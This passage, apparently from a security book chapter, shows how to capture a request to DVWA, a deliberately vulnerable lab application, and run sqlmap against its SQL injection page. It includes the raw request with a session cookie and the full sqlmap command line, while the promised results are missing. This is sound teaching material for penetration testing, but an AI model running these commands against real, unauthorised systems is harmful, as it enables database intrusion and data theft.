There are tools to automate SQL injection, detection, and exploitation. Just for further review, we are going to show how to exploit the same vulnerability using sqlmap, which is a tool focused on SQL injection vulnerabilities.

First, we need to extract the request sent by the application to the server. Using an HTTP proxy, we get it:

    GET /dvwa/vulnerabilities/sqli/?id=cosa&Submit=Submit HTTP/1.1
    Host: 192.168.1.72
    User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:63.0) Gecko/20100101 Firefox/63.0
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
    Accept-Language: en-US,en;q=0.5
    Accept-Encoding: gzip, deflate
    Connection: close
    Cookie: security=low; PHPSESSID=os91d50l1vbbipkvk7v0id7he2
    Upgrade-Insecure-Requests: 1
    Cache-Control: max-age=0

Now, we are going to launch sqlmap from a command line using the parameters in the request and the following command:

    sqlmap.py -u "http://192.168.1.72:80/dvwa/vulnerabilities/sqli/?id=cosa^&Submit=Submit" --cookie="security=low;PHPSESSID=os91d50l1vbbipkvk7v0id7he2"

sqlmap going to do a lot of tests to determine what parameters are vulnerable and exploit them if is possible. It's all magic!

Finally, you can see the results, which are as follows:

Of course, sqlmap has more options to exploit in specific ways, but that is beyond the scope of this chapter; I recommend you read more about sqlmap at its website: http://sqlmap.org/.